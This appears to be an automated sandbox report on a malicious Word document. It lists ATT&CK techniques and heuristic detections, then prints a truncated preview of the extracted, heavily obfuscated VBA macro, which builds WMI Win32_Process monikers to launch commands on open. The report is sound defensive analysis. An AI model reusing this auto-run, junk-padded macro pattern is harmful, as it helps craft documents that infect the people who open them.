Verdict: MALICIOUS (Risk Score: 282)

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1137.001 Office Application Startup: Office Application
The sample contains a VBA macro with an AutoOpen function, a common technique for executing malicious code when the document is opened. The macro uses GetObject and CreateObject to reach the Win32_Process WMI object, indicating an attempt to execute arbitrary commands or download additional payloads. The ClamAV detection further supports the malicious verdict.
Heuristics (8)

- ClamAV: Doc.Trojan.Agent-6864193-0 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Trojan.Agent-6864193-0
- VBA macros detected [medium, 4 related findings] OLE_VBA_MACROS: Document contains VBA macro code
- VBA WMI Win32_Process launcher [critical] OLE_VBA_WMI_PROCESS_CREATE: VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
- AutoOpen macro [high] OLE_VBA_AUTOOPEN: AutoOpen macro
- GetObject call [high] OLE_VBA_GETOBJ: GetObject call
- VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 59752 bytes |

SHA-256: d810e7bbdfe314a8c9a04b99cc80e3670654c5e5a20a9dfadee964d65dfe3d5a

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "I65886_7"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "j_301_4"
Function h_80_4()
Select Case R5024__4
Case 808205534
d_2_6286 = Log(H_5551)
F932_2 = CDate(581431024)
A796__61 = Fix(81906182 + 991698083 + a440_3 - Oct(375557815))
z_440897 = Cos(776132838 - Sqr(40906660 - Atn(152188450)) - 410286435 + 183186648)
End Select
Select Case B0_3794
Case 406957235
i__43_1 = Log(j__7513)
A20_35_ = CDate(435500583)
A607__57 = Fix(787165315 + 141496947 + b1_1943 - Oct(620036028))
r_60_0 = Cos(743577404 - Sqr(469632632 - Atn(325863071)) - 715341109 + 597706190)
End Select
Select Case X4_731
Case 253221791
D__400__ = Log(L05_49)
D99_61 = CDate(293870899)
l_022_ = Fix(842989057 + 693218247 + p7_2_2_ - Oct(600724923))
O8_3_3 = Cos(118170281 - Sqr(273805978 - Atn(262335526)) - 371604673 + 815687713)
End Select
Select Case s33___26
Case 525810926
H_0_77_ = Log(a___2_27)
j_6_165_ = CDate(231779199)
c_735836 = Fix(624487944 + 799378154 + T6253__ - Oct(817344290))
j18_308 = Cos(130588229 - Sqr(663713986 - Atn(531091653)) - 795397935 + 61847048)
End Select
Select Case N_739_
Case 120584163
z_2_1010 = Log(z9_0_57)
q76414 = CDate(696160460)
T__561_ = Fix(899525369 + 452633790 + d_306_8 - Oct(479471634))
s36__399 = Cos(43285922 - Sqr(445374551 - Atn(349789030)) - 945857266 + 676970423)
End Select
Select Case V__7471
Case 248743068
A82_3991 = Log(G6__8028)
t__86_2 = CDate(931253698)
i207__2 = Fix(596935752 + 603997771 + F__711__ - Oct(600106463))
w__4_96 = Cos(349501486 - Sqr(544954874 - Atn(700715627)) - 998973140 + 841461371)
End Select
Select Case s087591_
Case 442968360
r672_8 = Log(N8_58722)
E4419_ = CDate(673898688)
i_23738 = Fix(124235128 + 322794035 + O429_3_ - Oct(382599726))
J7_966 = Cos(989071839 - Sqr(823736958 - Atn(752317694)) - 566598719 + 410213981)
End Select
End Function
Function F__31__(z15_3163, b2888_99)
On Error Resume Next
Select Case p86_953_
Case 210385552
o15528_ = Log(h__449_2)
q7__92_1 = CDate(936192825)
L908534 = Fix(813729432 + 53042204 + Q42_82 - Oct(601844588))
D782__5 = Cos(706159686 - Sqr(259948270 - Atn(375302225)) - 500855325 + 859501979)
End Select
Select Case P_5_81__
Case 801647489
C9_85_ = Log(V_8_132)
P80_84 = CDate(631918369)
W_148_6_ = Fix(224575861 + 272668926 + r__82_ - Oct(737722534))
n6__04 = Cos(116194754 - Sqr(374614334 - Atn(502929177)) - 382126723 + 187581181)
End Select
K25_828 = M5__6_4 + "winmgmts:Win32_ProcessStartup" + b30908
Select Case W987___6
Case 260599363
u_8___87 = Log(C710277)
F795797 = CDate(213997182)
I_40_059 = Fix(486151449 + 907082291 + o_6627_ - Oct(697009300))
D966592 = Cos(157970170 - Sqr(390973502 - Atn(740788403)) - 186277019 + 695866603)
End Select
Select Case F60_589
Case 127599242
D00_054 = Log(s__793_)
J66_02_3 = CDate(759741644)
I26_890 = Fix(648286816 + 759457851 + P8___3 - Oct(959767833))
R___9311 = Cos(562963932 - Sqr(920523834 - Atn(485749248)) - 531693326 + 509834134)
End Select
i01___06 = Y3__75__ + "winmgmts:Win32_Process" + r4_504
Select Case W_02669
Case 440720411
T28088 = Log(z_11_26)
p3897_0 = CDate(756832063)
r1245125 = Fix(38911511
... (truncated)